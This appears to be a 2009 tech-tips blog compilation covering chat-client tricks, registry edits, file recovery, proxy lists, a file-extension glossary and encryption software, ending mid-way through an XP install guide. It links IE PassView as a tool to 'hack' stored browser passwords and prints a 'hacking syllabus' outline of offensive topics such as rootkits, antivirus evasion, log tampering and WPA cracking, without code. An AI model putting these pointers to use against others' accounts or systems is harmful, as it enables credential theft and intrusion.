Image:AVS BMP CIN DCX DIB DPX FITS GIF ICO JFIF JIF JPE JPEG JPG MIFF OTB P7 PALM PAM PBMPCD PCDS PCL PCX PGM PICT PNG PNM PPM PSD RAS SGI SUN TGA TIF TIFF WMF XBM XPM YUV CGM DXF EMF EPS MET MVG ODG OTG STC SVG SXC WMF
Movie:3GP (in/out) AMV (out) ASF (in) AVI (in/out) DV (in) FLI (in) FLV (in) MKV (in) MOV (in/out) MP4 (in/out) MPG (in/out) OGM (in) SWF (out) VOB (in) WMV (in)
Archives:7Z BZ2 BZA CAB GZ LHA LZH RAR TAR TGZ YZ1 ZIP
TEXT: HTML, XHTML, doc , RTF, PDF, PS, Open Office, Star Writer, Pocket Word, Word Perfect, CSV, dBase, Microsoft Excel, Pocket Excel, Lotus 123, Quattro Pro, Star Calc, Open Office spreadsheet.
No software installation, Media-Convert let you read all kind of documents.
Convert files, for exampleto read all Open Office files with Microsoft Office or convert files into universal formats like Adobe PDF, PS (PostScript) or CSV toprint, fax ou simply read them on any computer, without special software.
Insert a PDF into your web page by converting it into an SWF Flash file.
Export easily Microsoft Access database to an Excel table.
Capture a website as an image.
Encode a text with UTF-8 codes or with one of 900 other charsets.

http://media-convert.com/convert/index.php
http://www.zamzar.com

GOOGLE TALK LAB EDITION

2009-07-29T16:05:00.003+05:30

(Image Source: Google Talk)
Google Talk, Lab Edition is an experimental release from Google that brings feature of Google Talk online gadget into Google Talk desktop client.
The overall list of features is quite surprising. A number of prominent features are missing at the cost of not so important feature!
Here is the list of features this Lab Edition comes with…

Group chat, tabbed chatting (from online gadget)
Receiving notification from Gmail, Orkut and Google Calendar (from desktop client)
Option to set Gmail as default mail client,ability to launch Gmail, orkut, google calendar from system tray (Newly Added)
Snooze option – disable notification for one hour. Better than disabling all notifications in present desktop client.

Here is the list of missing features…

file transfer
voice chat
invisible status option as in Gmail Chat
option to hide offline friends from list
option to change display picture
setting option is not coming when offline.

Forget invisible status option as we can use gAlwaysIdle for that, but ability to hide offline friends is must have, as with ~3000 contact in my Gmail list, finding online buddies is a though job!
What caught my eyes is simple settings pane. Of course it need to be made a little complex to incorporate missing features in next release…

Overall its little slow and some missing feature.
You can download the lab edition of google talk here.

ALWAYS IDLE IN GOOGLE TALK

2009-07-29T15:35:00.000+05:30

Always idle in google talk by a third party software.
It basically adds a set of status options as you can see in above image!
As highlighted you can choose Always Idle if you are too busy at work. Many users will think that you are not at desk or something similar and thus won’t bother you.
Also there is an exactly opposite option – Never Idle. In case you want to look always online no matter even if you forget to shut down your PC at night!

1.Download gAlwaysIdle Setup

2.Download gAlwaysIdle Setup

RETRIEVE STORED PASSWORD IN INTERNET EXPLORER

2009-07-29T13:06:00.000+05:30

IE PassView is an utility to hack / reveal / Retrieve stored passwords in Internet explorer.

This software will reveal all the passwords and the corresponding site url saved in credentials file, Registry, Auto complete passwords, Saved HTTP Authentication passwords.
This utility can be downloaded from the following url
http://www.nirsoft.net/utils/iepv.zip

MULTIPLE YAHOO MESSENGER

2009-07-29T13:01:00.000+05:30

To open two or more instance for logging in to multiple accounts perform the following registry edit.
Copy the text below:



REGEDIT4

 [HKEY_CURRENT_USER\Software\yahoo\pager\Test]
“Plural”=dword:00000001

Then paste it in NOTEPAD and save it in “reg” extension,
Open the saved registry file
Now you will be able to open multiple yahoo messenger.

DETECT INVISIBLE FRIEND IN YAHOO

2009-07-29T12:57:00.001+05:30

There are several tricks available in the Internet to find the yahoo messenger friend’s original status. Here is the one more simple way to find the user’s real status.

The following site will tell you the real status of the yahoo id in the messenger.
You just need to give your friends id. Your yahoo userid is not required.

http://detectinvisible.com/
http://www.ydetector.com/
http://www.vizgin.com//
http://www.invisible-scanner.com/

LIST OF POPULAR FILE RECOVERY SOFTWARES

2009-07-29T11:45:00.001+05:30

Undelete is a process of restoring computer files which have been removed/deleted from a file system by file deletion. Deleted data can be recovered on many file systems, but not all file systems provide an undeletion feature.

List of popular undelete softwares.

Undelete Plus.
Undelete Plus
Restoration
Restortion
PC Inspector File Recovery
PC Inspector
Recuva
Recuva.
Handy Recovery
Handy Recovery
Disk Internals Uneraser
DiskInternals Uneraser
The Undelete Data Recovery Software
The Undelete Data Recovery Software
Free Undelete
FreeUndelete
File Rescue Plus
File-Rescue Plus
Final Recovery File Undelete Utility
FinalRecovery

HOW TO FIND INVISIBLE FRIEND IN GTALK

2009-07-28T00:53:00.000+05:30

Google introduces a new status only in gmail but not in gtalk .In which you shown invisible to your friend. Here is the simple trick to find the friends who are online in google talk but appearing offline.
Follow these steps to check who all are in invisible state.

Open the chat window by clicking your friend’s name
Click you friends name and select “Go off the Record”.
Send some message to that user.
if you get the feedback from gtalk that “User is offline and can’t receive messages” in red color means that the user is really offline.
But if you get no response that means that the user is appearing offline and in invisible mode.

HACKING SYLABUS

2009-07-23T18:17:00.000+05:30

• Security testing methodologies
• The Ethical Hacking Profession
• Passive Intelligence Gathering – 2008 Version
• Network Sweeps
• Stealthily Network Recon
• Passive traffic identification
• Identifying system vulnerabilities
• Abusing Domain Name System (DNS)
• Abusing Simple Network Management Protocol
   (SNMP)

• Introduction to Remote Exploits
• Engineering remote exploits
• Running shell code in RAM vs. on disk
• Heap Buffer Overflows
• Compromising Windows 2003 Server Systems
• Compromising Solaris, Unix and Linux Systems
• Attacking RDP (Remote Desktop Protocol) in
Windows XP, 2003 & Vista
• Windows password weaknesses & Rainbow Tables
• Unix password weaknesses
• Attacking Cisco’s IOS password weaknesses

Trojan genres
• Windows, Unix and Linux Trojans
• Kernel Mode Windows Rootkits – System Call
   Hijacking and Direct Kernel Object Modification
• Kernel Mode Linux Rootkits
• Covert communication channels
• Spoofing endpoints of communication tunnels
• Tunneling through IPSec VPNs by abusing ESP
• Steganographic Tunnels
• Remote command execution
• Sniffing and hijacking SSL encrypted sessions
• Installing sniffers on low privilege account in
   Windows 2003 Server
• Stealthy Remote keylogger installation
• Circumventing Antivirus

Modifying syslog entries
• Raw binary editing to prevent forensic
   investigations
• Editing the Windows Event Log
• Abusing Windows Named Pipes for Domain
   Impersonation
• Impersonation of other Users- Hijacking kernel
   tokens
• Disguising network connections
• Attacking Cisco IOS
• Attacking STP & BGP protocols
• Wireless Insecurity
• Breaking Wireless Security – WEP, WPA, WPA2
• Blinding IDS & IPS
• Attacking IDS & IPS

Malicious event log editing
• Binary filesystem modification for anti-forensics
• Named Pipe abuse
• Kernel Token Hijacking
• Attacking Border Gateway Protocol (BGP)
• Attack WEP
• Cracking WPA
• Cracking WPA2
• Cisco IOS Exploits
• Breaking into Cisco routers
• Blinding IPS
• Attacking IPS

Abusing Web Applications
• Attacking Java Applets
• Breaking web app authentication
• SQL Injection techniques
• Modifying form data
• Attacking session IDs
• Cookie stealing
• Cross Site Scripting
• Cross Site Request Forgery (CSRF) Attacks

Remote buffer overflow exploit lab
• Custom compiling Shellcode
• Running payloads in RAM
• Hiding exploit payloads in jpeg and gif image files
• Attacking email vectors (Lotus Notes and
   Microsoft Exchange, and Outlook Web Access)
• Registry manipulation
• Client side IE & Firefox exploits
• Using custom Trojans to circumvent Antivirus
• Remote kernel overflows
• RDP (Remote Desktop Protocol) Exploitation
• Cracking Windows Passwords
• Building Rainbow Tables
• Cracking Windows 2003 native mode passwords
• Brute forcing salted Unix passwords
• Attacking Kerberos Pre-Auth Hashes
• Cracking IOS and PIX passwords

• Compromise a DMZ setting with port redirection
• Circumvent firewall IP access list (ACL)
• Customizing Trojans to avoid Antivirus
• Deploying kernel mode rootkits on Windows 2003
& Vista
• Installing LKM rootkits on Linux servers
• Hijacking MSN messenger traffic
• Running commands remotely
• Breaking wireless encryption – WEP, WPA, WPA2
• Installing sniffers in low privilege user accounts
• Sniffing remotely and retrieving results
• Remote keylogging
• Tunneling with cover channels through IPSec VPNs
• Hijack and capture SSL traffic

Network Sweeping
• Scanning from spoofed IP addresses
• Stealthy Recon
• Injecting p0f for passive OS fingerprinting
• Scanning through firewalls
• IPv6 Scanning
• Discover all subdomains owned by an
   organization
• Inspect changes to whois record over last 3
   years
• Windows 2003 Server & Vista DNS Cache
   Poisoning Attacks
• Pumping SNMP for data – OID Dissection
• Attacking SNMP

DONT CREATE THUMLIN.DB

2009-07-23T17:28:00.000+05:30

When viewing a folder with the Thumbnail view, WindowsXP creates a thumbs.db file.
This is a cache of the current pictures in that directory.
If you want to turn this feature off and save a little disk space
Start the Windows Explorer
Go to Tools / Folder Options / View
In the first section under Files and Folders, check Do not cache thumbnails
Now you can search for the thumbs.db file on your computer and remove them. No more should be created.

NTLDR NOT FOUND

2009-07-23T16:37:00.003+05:30

If you get an error that NTLDR is not found during bootup,
If you have FAT32 partitions, it is much simpler than with NTFS.
Just boot with a Win98 floppy and copy the NTLDR or NTDETECT.COM files
from the i386 directory to the root of the C:\ drive.
For NTFS:
Insert and boot from your Windows XP CD.
At the first R=Repair option, press the R key
Press the number that corresponds to the correct location for the installation of Windows you want to repair.
Typically this will be #1
Enter in the administrator password when requested
Enter in the following commands (X: is replaced by the actual drive letter that is assigned to the CD ROM drive.
COPY X:\i386\NTLDR C\:
COPY X:\i386\NTDETECT.COM C:\
Take out the CD ROM and type exit

CLONE YOUR HARD DRIVE

2009-07-20T21:38:00.006+05:30

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all you needed, was already set up on your current system? Well, it is, and if you follow this tutorial, you shouldn't have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:

"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master,then check your new Master out.

BEST PROXY SITE

2009-07-11T19:59:00.003+05:30

Here are some best proxy site.

1. http://www.shadowsurf.com/
2. http://anonymouse.ws/
3. https://www.hidemyass.com
4. http://www.your-freedom.in
5. http://www.cooltunnel.com/
6. http://www.browseatwork.com
7. http://www.proxify.com
8. http://www.novalok.net
9. http://bypass.4clever.com/
10. http://www.b3u.net
11. http://www.hidemyass.com
12. http://www.mathcookbook.com
13. http://www.guardster.com/subscription/proxy_free.php
14. http://www.anonymouse.org
15. http://www.tinyurl.com/ntbam
16. http://www.ghostproxy.com
17. http://www.papertigershark.com
18. http://www.iphide.co.uk
19. http://www.hackersproof.com
20. http://www.kcoolonline.com
21. http://www.ghostsurfing.co.uk
22. http://www.anonycat.com
23. http://www.browseatwork.com
24. http://rapidwire.net
25. http://62.193.247.221/
26. http://prox30.com
27. http://www.privax.us
28. http://www.etary.com
29. http://s1.iphide.com
30. http://proxiesrus.com
31. http://www.surfindark.com
32. http://www.navydog.com
33. http://falsario.com
34. http://www.cheekyproxy.com
35. http://www.funkyproxy.com
36. http://www.surfsneaker.com
37. http://www.proxii.com
38. http://www.proxynumber1.com (Replace 1 with any number between 1 to 10)
39. http://myspaceproxyy.com
40. http://tenpass.com
41. http://www.browsesneaky.com
42. http://www.proogle.info
43. http://greatproxy.info
44. http://www.realproxy.info
45. http://aplusproxy.com
46. http://www.ecoproxy.com
47. http://proxiesrus.com/
48. http://www.navydog.com
49. http://www.cheekyproxy.com
50. http://www.funkyproxy.com
51. http://www.surfsneaker.com
52. http://www.proxii.com
53. http://myspaceproxyy.com
54. http://tenpass.com
55. http://www.ecoproxy.com
56. http://www.browsehidden.com/
57. http://www.surfsneaky.com/
58. http://www.filterhide.com/
59. http://www.birdsflyfast.com

ALL FILE FORMAT WITH THEIR EXTENSION

2009-07-11T15:29:00.005+05:30

ABK :-Corel Draw AutoBackup
ACL :-Corel Draw 6 keyboard accelerator
ACM :-Used by Windows in the system directory
ACP :-Microsoft Office Assistant Preview file
ACT :-Microsoft Office Assistant Actor file
ACV :-OS/2 drivers that compress and decompress audio data
AD :-After Dark screensaver
ADB :-Appointment database used by HP 100LX organizer
ADD :-OS/2 adapter drivers used in the boot process
ADM :-After Dark MultiModule screensaver
ADP :-Used by FaxWorks to do setup for fax modem interaction
ADR :-After Dark Randomizer screensaver
AFM :-Adobe font metrics
AF2 :-ABC Flowchart file
AF3 :-ABC Flowchart file
AI :-Adobe Illustrator drawing
AIF :-Apple Mac AIFF sound
ALB :-JASC Image Commander album
ALL :-Arts & Letters Library
AMS :-Velvert Studio music module (MOD) file
ANC :-Canon Computer Pattern Maker file that is a selectable list of pattern colors
ANI :-Animated Cursor
ANS :-ANSI text
API :-Application Program Interface file; used by Adobe Acrobat
APR :-Lotus Approach 97 file
APS :-Microsoft Visual C++ file
ARC :-LH ARC (old version) compressed archive
ARJ :-Robert Jung ARJ compressed archive
ART :-Xara Studio drawing
ART :-Canon Crayola art file
ASA :-Microsoft Visual InterDev file
ASC :-ASCII text
ASD :-WinWord AutoSave
ASM :-Assembler language source file
ASP :-Active Server Page(an HTML file containing a Microsoft server-processed script)
ASP :-Procomm Plus setup and connection script
AST :-Claris Works "assistant" file
ATT :-AT&T Group 4 bitmap
AVI :-Microsoft Video for Windows movie
AWD :-FaxView document
BAK :-Backup file
BAS :-BASIC code
BAT :-Batch file
BFC :-Windows 95 Briefcase document
BG :-Backgammon for Windows game
BI :-Binary file
BIF :-GroupWise initialization file
BIN :-Binary file
BK :-Sometimes used to denote backup versions
BK$ :-Also sometimes used to denote backup versions
BKS :-An IBM BookManager Read bookshelf
BMK :-An A bookmark file
BMP :-Windows or OS/2 bitmap
BM1 :-Apogee BioMenace data file
BRX :-A file for browsing an index of multimedia options
BSP :-Quake map
BS1 :-Apogee Blake Stone data file
BTM :-Batch file used by Norton Utilities
B4 :-Helix Nuts and Bolts file
C :-C code
CAB :-Microsoft cabinet file(program files compressed for software distribution)
CAL :-CALS Compressed Bitmap
CAL :-Calendar schedule data
CAS :-Comma-delimited ASCII file
CAT :-IntelliCharge categorization file used by Quicken
CB :-Microsoft clean boot file
CCB :-Visual Basic Animated Button configuration
CCF :-Multimedia Viewer configuration file used in OS/2
CCH :-Corel Chart
CCM :-Lotus CC:Mail "box" (for example, INBOX.CCM)
CDA :-CD Audio Track
CDF :-Microsoft Channel Definition Format file
CDI :-Phillips Compact Disk Interactive format
CDR :-Core Draw drawing
CDT :-Corel Draw template
CDX :-Corel Draw compressed drawing
CEL :-CIMFast Event Language file
CFB :-Comptons Multimedia file
CFG :-Configuration file
CGI :-Common Gateway Interface script file
CGM :-Computer Graphics Metafile
CH :-OS/2 configuration file
CHK :-File fragments saved by Windows Disk Defragmenter or ScanDisk
CHP :-Ventura Publisher chapter
CIL :-Clip Gallery download package
CIM :-Sim City 200 file
CIN :-OS/2 change control file that tracks changes to an INI file
CK1 :-iD/Apogee Commander Keen 1 data file
CK2 :-iD/Apogee Commander Keen 2 data file
CK3 :-iD/Apogee Commander Keen 3 data file
CK4 :-iD/Apogee Commander Keen 4 data file
CK5 :-iD/Apogee Commander Keen 5 data file
CK6 :-iD/Apogee Commander Keen 6 data file
CLASS:-Java class
CLP :-Windows Clipboard file
CLS :-Visual Basic Class Module
CMD :-Command file for Windows NT (similar to a DOS .BAT file)
CMD :-DOS CP/M command file
CMD :-dBase-II program file
CMF :-Corel Metafile
CMP :-JPEG Bitmap
CMP :-Address document
CMV :-Corel Move animation
CMX :-Corel Presentation Exchange image
CNF :-Configuration file used by Telnet, Windows, and other applications
CNM :-Windows application menu options and setup file
CNQ :-Compuworks Design Shop file
CNT :-Windows (or other) system content files for the help index and other purposes
COB :-trueSpace2 object
COD :-Microsoft C compiler output as displayable assembler with original C as comments
COM :-Command file (program)
CPD :-Fax Cover document
CPE :-Fax Cover document
CPI :-Microsoft MS-DOS code page information file
CPL :-Control Panel extension
CPL :-Corel colour palette
CPP :-C++ code
CPR :-Corel Presents Presentation
CPT :-Corel Photo-Paint image
CPX :-Corel Presentation Exchange Compressed drawing
CRD :-Cardfile file
CRP :-Corel Presents Run-Time Presentation
CRT :-Certificate file
CSC :-Corel Script
CSP :-PC Emcee On-Screen image
CSV :-Comma-separated values file
CT :-Scitex CT Bitmap
CTL :-Used in general to mean a file containing control information.
CUE :-Microsoft Cue Cards data
CUR :-Windows Cursor
CUT :-Dr Halo bitmap
CV :-Corel Versions archive
CV :-Microsoft CodeView information screen
CWK :-Claris Works data file
CWS :-Claris Works template
CXX :-C++ source code file
DAT :-Data file
DAT :-WordPerfect Merge Data
DBF :-Aston-Tate dBASE database
DBX :-DataBeam image
DCR :-Shockwave file
DCS :-Desktop Color Separation file
DCX :-Fax image (based on PCX)
DDF :-BTRIEVE database
DEF :-SmartWare II data file
DEF :-C++ Definition
DER :-Certificate file
DIB :-Device-Independent Bitmap
DIC :-Dictionary
DIF :-Data Interchange Format spreadsheet
DIR :-Macromedia Director file
DIZ :-Description file
DLG :-C++ Dialogue Script
DLL :-Dynamic-Link Library
DMF :-X-Trakker music module (MOD) file
DOC :-FrameMaker or FrameBuilder document
DOC :-WordStar document
DOC :-WordPerfect document
DOC :-Microsoft Word document
DOT :-Microsoft Word document Template
DPR :-Borland Delphi project header file
DRV :-Driver
DRW :-Micrografx Designer/Draw
DSG :-DooM saved game
DSM :-Dynamic Studio music module (MOD) file
DSP :-Microsoft Developer Studio project
DSQ :-Corel QUERY file
DSW :-Microsoft Developer Studio workspace
DWG :-AutoCAD drawing eXchange format
DXF :-AutoDesk Drawing Interchange format
EMF :-Enhanced Windows Metafile
ENC :-Encore file
EPS :-Encapsulated PostScript image
ER1 :-ERWin file
ERX :-ERWin file
EVY :-Envoy document
EWL :-Microsoft Encarta document
EXE :-Executable file (program)
F :-FORTRAN file
F77 :-FORTRAN file
F90 :-FORTRAN file
FAR :-Farandole Composer music module (MOD) file
FAV :-Microsoft Outlook navigation bar
FAX :-FAX Type image
FH3 :-Aldus Freehand 3 drawing
FIF :-Fractal image file
FITS:-CCD camera image
FLC :-AutoDesk FLIC animation
FLI :-AutoDesk FLIC animation
FLT :-Corel filter
FLT :-StarTrekker music module (MOD) file
FMB :-Oracle binary source code for form, version 4.0 and later
FMT :-Oracle text format of form, version 4.0 and later
FMT :-Microsoft Schedule+ print file
FMX :-Oracle executable form, version 4.0 and later
FOG :-Fontographer font
FON :-System font
FOR :-FORTRAN file
FOT :-Font-related file
FP :-FileMaker Pro file
FP1 :-Flying Pigs for Windows data file
FP3 :-FileMaker Pro file
FPX :-FlashPix bitmap
FRM :-Form
FRM :-FrameMaker or FrameBuilder document
FRM :-Oracle executable form version 3.0 and earlier
FRM :-Visual Basic form
FRM :-WordPerfect Merge form
FRX :-Visual Basic form stash file
GAL :-Corel Multimedia Manager album
GCP :-Ground Control Point file used in image processing of remote sensing data .
GED :-Graphic Environment Document (drawing)
GEM :-GEM metafile
GEN :-Ventura-Generated text file
GFC :-Patton&Patton Flowcharting 4 flowchart file
GFI :-Genigraphics Graphics Link presentation
GFX :-Genigraphics Graphics Link presentation
GID :-Windows 95 global index file (containing help status)
GIF :-CompuServe bitmap
GIM :-Genigraphics Graphics Link presentation
GIX :-Genigraphics Graphics Link presentation
GNA :-Genigraphics Graphics Link presentation
GNX :-Genigraphics Graphics Link presentation
GRA :-Microsoft Graph
GRD :-Grid file, used in image processing of remote sensing data often to form map projections.
GRP :-Program Manager Group
GTK :-Graoumftracker (old) music module (MOD) file
GT2 :-Graoumftracker (new) music module (MOD) file
GWX :-Genigraphics Graphics Link presentation
GWZ :-Genigraphics Graphics Link pres
H :-C program header
HED :-HighEdit document
HEL :-Microsoft Hellbender saved game
HEX :-Macintosh BinHex 2.0 file
HGL :-HP Graphics Language drawing
HLP :-Help file
HOG :-Lucas Arts Dark Forces WAD file
HPJ :-Visual Basic Help Project
HPP :-C++ program header
HQX :-Macintosh BinHex 4.0 file
HST :-History file
HT :-HyperTerminal
HTM :-Hypertext document
HTML:-Hypertext document
HTX :-Extended HTML template
ICA :-Citrix file
ICB :-Targa bitmap
ICM :-Image Color Matching profile file
ICO :-Windows Icon
IDD :-MIDI Instrument Definition
IDQ :-Internet Data Query file
IFF :-Amiga ILBM
IGF :-Inset Systems metafile
IIF :-QuickBooks for Windows interchange file
IMA :-WinImage file
IMG :-GEM image
INC :-Assembler language or Active Server include file
INF :-Information file
INI :-Initialization file
INP :-Oracle source code for form, version 3.0 and earlier
INS :-InstallShield install script
INS :-X-Internet sign-up file
ISO :-Lists the files on a CD-ROM; based on the ISO 9660 CD-ROM file system standard
ISP :-X-Internet sign-up file
ISU :-InstallShield uninstall script
IT :-Impulse Tracker music module (MOD) file
IW :-Idlewild screensaver

ENCRYPTION ,CRYPTOGAPHY AND STEGANOGRAPHY

2009-07-11T13:05:00.003+05:30

FREE PUBLIC KEY ENCRYPTION SOFTWARE

This page lists free encryption and cryptographic software of a wide variety. There are free on-the-fly disk encryption and on the fly file encryption (OTFE) software that transparently encrypts files on your disk drive (or partition), on demand encryption tools that allow you to encrypt single files for those one-off occasions when you need encryption public key encryption which is particularly useful for things like email (where the key you use to encrypt your data is different from the key used to decrypt the data).Here are also software that can perform steganography, a sort of invisible encryption, where the plaintext version of your sensitive data
is encrypted and hidden inside another file (typically images or sound or video files).

Furthermore, if you need to ensure the privacy or security of your data, you might also be interested in the free Destructive Deletion Tools, Disk and File Wipe Utilities, Secure Deletion Software.

As usual, commercial software like the well-known PGP Whole Disk Encryption and PGP Desktop Email Encryption are not listed here.

SCRAMDISK :-

Scramdisk for Linux is a suite of Linux tools that allow you to create and access Scramdisk and TrueCrypt containers. It has a Linux driver that allows you to mount such containers. Scramdisk for Windows and TrueCrypt are free on-the-fly disk encryption software that you can find elsewhere on this page.

FREEOTFE:-

FreeOTFE is an open source OTFE (on the fly disk encryption) software for Windows. It presumably creates encrypted partitions (the documentation does not explicitly state this, nor does it state if it supports the creation of encrypted container files). You mount the encrypted volume under Windows and it appears as a drive which you can use normally. FreeOTFE supports "hidden volumes" which are encrypted volumes that are created inside another
encrypted volume. All FreeOTFE volumes also have no identifiable signature. It is compatible with Linux losetup, which is useful if you need to use your encrypted volumes in both Linux and Windows. Supported ciphers include AES and Twofish, and supported hash algorithms include MD2, MD4, MD5, RIPEMD-128, RIPEMD-160, SHA-1, SHA-224, SHA-256, SHA-384, SHA-512.

TRUECRYPT:-

TrueCrypt is the successor to E4M (which is no longer maintained). You can use it to encrypt an entire partition of your hard disk or to create an encrypted container file which appears like a normal hard disk to Windows. You can then store and access your files on that virtual drive just like any other file. Since the program does not mark the encrypted container (or partition) in any way, there's no way to for any intruder to guess which file is your encrypted container. This, according to the author, also preserves plausible deniability. Encryption algorithms supported include AES, Blowfish, CAST, IDEA (removed in version 2.1a) and Triple-DES. The source code
is available free. This program works under Windows XP, 2000 and 2003 and Linux.

COMPUSEC:-

CompuSec encryption software will encrypt your entire hard disk (including your operating system) using a "fast AES algorithm". It also supports the encryption of floppy disks, memory sticks and other removable devices. Even your Windows hibernation file is stored encrypted on the disk.

CRYPTAINER

Cryptainer LE allows you to create 25 MB encrypted containers that appear to Windows as disk drives. It supports Windows 95 (OSR 2), 98, ME, 2000, XP and 2003. It uses the Blowfish algorithm. It apparently also allows you to send encrypted emails as well.

CRYPTOEXPET LITE:-

CryptoExpert Lite is a free on the fly encryption program that creates a virtual disk on your disk from a container file. It supports the CAST encryption algorithm.

E4M DISK ENCRYPTION:-

E4M Disk Encryption Working with documents on your computer where you don't want prying eyes to see? You can get free software that sets up a drive on your hard disk where all files saved will be encrypted. The drive need not be an actual hard disk or partition, it can be a file that is set up to look like a drive to Windows for transparent operation. It is easy to use, free, freely redistributable with the full source code available. It works on all Windows systems.Supported encryption include DES, IDEA, Triple-DES, Blowfish, and CAST. If you find yourself continually encrypting individual files on your computer, this might prove to be the easier to use solution.

SCRAMDISK:-

Scramdisk allows you to create an encrypted virtual drive on your Windows systems where you can store files which will be automatically encrypted. The drive acts like a normal drive which you can access just like any other disk drive on your system. Supported encryption algorithms include Triple DES (EDE), Blowfish, DES, IDEA, MISTY1, Square, and TEA (both 16 and 32 rounds).

WINDOWS PRIVACY TOOLS(WINPT):-

Windows Privacy Tools (WinPT)(including the Windows Privacy Tray, ie WinPT Tray, and the WinPT Explorer extensions), is a set of tools that allow you to encrypt your data using GnuPG (see elsewhere on this page). It is a frontend to GnuPG that resides in your system tray that may be used as a universal plug-in to any email software. The software is free.

PGP (Pretty Good Privacy):-

The above link is to the International PGP Home Page, where you can get free binaries and sources for Pretty Good Privacy (PGP) for a variety of operating systems for either US or non-US countries. You can use PGP to encrypt your email in conjunction with your email client, be it Eudora, ELM, PINE, or whatever. PGP is a public key encryption system, which means that you have two keys (passwords), one which is known only to you and the other is known to your recipient. Messages or documents (or whatever) encoded with one key can only be decoded with the other.
You can read more about this from the PGP FAQs at the site. Note that the free versions of PGP lag behind the commercial (paid) PGP Whole Disk Encryption and PGP Desktop Email Encryption.

GPG: GNU Privacy Guard:-

GPG, a.k.a. GnuPG, is the GNU version of PGP (Pretty Good Privacy), a public key encryption system. Like all things GNU, it is free and can be freely distributed and modified. It is generally compatible with the newer PGP versions (depending on the encryption algorithms you choose); but you should read their FAQ for more details.

FREE ENCRYPTION SOFTWARE WITH STEGANOGRAPHY

S-TOOLS:-

S-Tools is an encryption software with steganographic capabilities. It hides files in BMP, GIF and WAV files after compressing and encrypting them. It runs on Windows and supports drag and drop. It uses the facilities provided in a freely available encryption library cryptlib (which supports a host of well known encryption algorithms like AES, Blowfish, etc) to perform its encryption.

4T HIT MAIL PRIVACY LITE :-

4t HIT Mail Privacy Lite encryption software allows you to hide your private data such as email messages inside an image (JPG, GIF, TIFF, BMP, etc). The image is still viewable as an image, but it also contains the encrypted version of your secret message (steganography). The website does not specify which encryption algorithm is used.

CAMOUFLAGE :-

Camouflage encryption software performs steganographic functions as well. It encrypts your file using an unspecified algorithm (in fact the website merely says it scrambles your data) and attaches them in another file of your choice, such as sound files, picture files, etc. I suspect that this software is only for the casual user who merely wants to hide files from a prying brother or sister) and not for anyone who really needs strong encryption (such as governmental agencies, banks, companies, and the like).

LOCKNOTE:-

LockNote encrypts your documents using AES 256. Your encrypted document will have an embedded decryption program that will run when you (or your recipient, if you are sending your document to someone else) double-click it in Windows NT/2000/XP. You can then enter the password to decrypt the document. The program is released under the GNU . General Public License.

BCARCHIVE:-

BCArchive is an encrypting, compressing archiver. It can compress a file, a group of files, or folders (subdirectories), and place the result into an encrypted archive. It uses algorithms like IDEA and Blowfish to encrypt the data, and PKCS #5 for deriving the encrypted key from the password string. It is also able to create a
self-extracting archive, so that the recipient of your archive (if you're sending it to someone) need not have to install BCArchive to access your files. You can also use public/secret key pairs with this program. BCArchive supports the following symmetric algorithms: Blowfish, IDEA, Triple-DES and CAST5. It supports the following
asymmetric algorithms: RSA and ElGammal/Diffie-Hellman. Secure hash algorithms supported include SHA-256, SHA-1,MD5, RIPEMD-160.

AXCRYPT:-

AxCrypt allows you to encrypt your files with the AES encryption algorithm (128-bit key). It supports the use of key files, huge files (more than 4 GB), shredding of temporary and plaintext files, an extensive command line interface as well as a right click interface from Windows Explorer, etc. The program is open source, distributed under the GNU General Public License.

FINECRYPT:-

FineCrypt allows you to encrypt a limited number of folders and files (although it will not encrypt archives like ZIP, ARC, CAB, ARJ, TAR and GZ files). Encryption algorithms supported include MARS, RC-6, Rjindael (AES),Serpent, Twofish, and others. You can encrypt select your encryption mode as well, from ECB, CBC, CFB and OFB. The software also allows you to create encrypted self-extracting executables.

FILE BUDDY:-

File Buddy encrypts and decrypts your files as well as securely wipes your original plaintext versions. It works on Windows 95, 98, ME, NT4, 2000. It is also able to compress your files before encrypting. The website does not specify the encryption algorithm used.Crypto-Lock uses SHA-1 and Blowfish (CBC mode) to encrypt your files (including executable files) after compressing it. It can produce self-decrypting modules, and overwrite the original plaintext version.

POWERCRYPT 2000:-

PowerCrypt uses a proprietary symmetric encryption algorithm to encrypt your data. It is a Windows program.

CCRYPT:-

CCrypt is a command line encryption tool that encrypts the files you specify. It is multiplatform with ports for Windows, Linux, Sun Solaris, Macintosh OS X, FreeBSD, AIX, etc. It uses the Rjindael AES cipher (Advanced Encryption Standard). The source code is available.

MCRYPT:-

mcrypt is a command line tool in the fashion of the Unix crypt command. It allows you to encrypt files that you specify on the command line using one of the following encryption algorithms: Blowfish, Twofish, DES, TripleDES,3-Way, Safer, Loki97, Gost, RC2, Mars, Rjindael AES, Serpent, Cast, Arcfour and Wake. The OpenPGP encrypted file
format is supported. This encryption tools works on Unix systems (including Linux) and has also been ported to Windows.

AUTOMATED INSTALLATION OF XP

2009-07-11T00:15:00.000+05:30

You can create a CD that can install Windows XP automatically, putting in all the details and answering all the dialog boxes.The secret behind this is the answer file, which tells Windows what to do while it’s installing. The answer file can be created using Windows setup manager.
Using this tool, you can make the answer file so powerful that you can even tell Windows to include or exclude individual components, set the display resolution, and more.

Here’s the Steps involved in creating XP Automated Installation Disc :

Step 1: To begin with, insert your Windows XP installation CD into the drive and copy the entire contents of the CD to a new folder on your hard disk.

Step 2: Navigate to the Support > Tools folder on the CD and double-click the Deploy.cab file. Copy all the files to a new folder on your hard disk.

Step 3: The crucial part begins now, creating the answer file. To execute the windows setup manager, double click the Setupmgr.exe file from the contents of the Deploy.cab, which you just copied onto the hard drive.

